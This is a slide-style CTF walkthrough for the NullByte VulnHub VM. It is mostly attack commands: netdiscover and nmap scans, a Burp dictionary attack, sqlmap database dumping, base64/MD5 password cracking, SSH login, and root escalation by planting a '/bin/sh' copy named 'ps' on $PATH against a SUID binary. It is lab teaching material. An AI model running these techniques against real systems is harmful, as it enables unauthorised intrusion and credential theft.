This is a presentation on exploiting Null Byte VM. Null Byte VM is an vulnerable vm available on vulnhub.In this presentation I had exploited vm with various tools available on kali linux and then escalated privileges to become root.In this CTF challenge we have to find a flag i.e. proof.txt.
2. ABOUT ME
Devansh Dubey
Volunteer at NULL Bhopal
Undergoing graduation from UIT RGPV
Cyber Security enthusiast
Twitter handle: @devanshdubey97
3. About Null Byte VM
• Name: NullByte: 1
• Codename: NB0x01
• Date release: 1 Aug 2015
• Author: ly0n
• Series: NullByte
• Web page: http://ly0n.me/2015/08/01/nullbyte-challenge-0x01/?
• Download: ly0n.me/nullbyte/NullByte.ova.zip
• Objective: Get to /root/proof.txt and follow the instructions.
• Level: Basic to intermediate.
• Description: Boot2root, box will get IP from dhcp, works fine with virtualbox
& vmware.
• Operating System: Linux
4. Our Agenda:
• Network Scanning (Nmap, netdiscover)
• Exacting hidden text from an image obtained from IP(ExifTool)
• Dictionary Attack using rockyou.txt(Burp suite) to obtain key.
• Obtaining Database information via Sqlmap
• Login to SSH on port 777
• Find SUID Binaries
• Privilege Escalation by Manipulating $PATH
• Get Root access and capture the flag(proof.txt)
5. LETS BEGIN
1. Netdiscover:
Netdiscover is an ARP scanner to scan for live hosts in a range of network.
In the first step we will find the target. We will use netdiscover, which is
command line tool in kali linux to find the target
• Netdiscover –r 172.16.219.0/24
7. 2. Nmap Scan
• Our target is 172.16.219.142 ,we will scan it using nmap.
• nmap -A 172.16.219.142
-A : For OS detection, version detection,script scanning,and traceroute.
• Scanning the IP, we will know that the port number 80, 111, 777, 44607 are open and the service
of SSH is forwarded from 22 to 777 port. Now we will try and open the targeted IP in the
browser.
9. 3. Exiftool:
Here is an image and a quote on the page. We will find nothing on the page and page source. Hence data
can be hidden . To see the hidden data we will use exiftool which is an open source tool available on github.
Available on: https://github.com/exiftool/exiftool
10. There you will find a comment kzMb5nVYJw. Now this might be a directory so lets open it on browser. On opening
it, we will see a text field which require a KEY.
12. 4. Dictionary Attack
• It is asking for a key, since it is a text field we will use the dictionary
attack to find the key using BurpSuite and rockyou.txt. (rockyou.txt
is an wordlist file available in /usr/share/wordlist directory).Through
the dictionary attack, we will find the key i.e. elite.
13.
14. 5. Using Sqlmap :
• Through the dictionary attack we will find the key i.e. elite. After entering the key
in the text field, the new web page will get opened which will be asking for
username, but till now we didn’t knew the username. So, we will find it in its
Database using sqlmap.
• sqlmap -u http://172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1 --
dbs –batch
--batch: never ask for user input, use default behaviour.
--dbs: databases
15. It will give you the name of the database
i.e. information_schema,mysql,performance_schema,seth.
16. 6. Now further we will find columns and tables and for
that type:
• sqlmap -u //172.16.219.142/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth --
dump-all –batch
• dump-all : dump all dbms databases entry.
• Once command executes, it will show you the table name along with column and
password as shown:
17. Now we know username is ramses and password is in encrypted form .
18. 7. Password decoding:
• Now we have username and password but the password is encrypted,
so we need to crack it and there are many online tools to do so.
• First decrypt with base64
• $ echo
“YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=” |
base64 –d
• Then to crack it go to md5decoder.org and give the md5 value there
and click on ok and it will show you the original word i.e. omega
19. 8. Login through SSH
Now we will SSH to log in and for that type:
• ssh ramses@172.16.219.142 -p 777
• After that give omega as the password. Once we login then by using
the following command, we can enumerate all binaries having SUID
permission.
• find / -perm -u=s -type f 2>/dev/null
• Here we found out that SUID bit enabled for
/var/www/backup/procwatch
21. 9. Privilege Escalation
• cd /var/www/bakcup/
• ./procwatch
Procwatch is security monitor written in Perl that watches a /proc filesystem for
new processes. When a process is created, procwatch reports the time, the
username, the PID, and the binary that was run. Its output is suitable for logging to
log files and is geared for system administrators who are testing a new but as yet
untrusted UNIX system.
Procwatch is root owned that mean the file is running with root priviliges.
22. 10. Privilege Escalation
• echo "/bin/sh" > ps
• chmod 777 ps
• echo $PATH
• export PATH=.:$PATH
• echo $PATH
• ./procwatch
• Due to ‘.’ in $PATH means that the user is able to execute binaries/scripts from the current
directory. Hence now on executing id command we will find ourselves as root.
• id
• cd /root
• ls
• cat proof.txt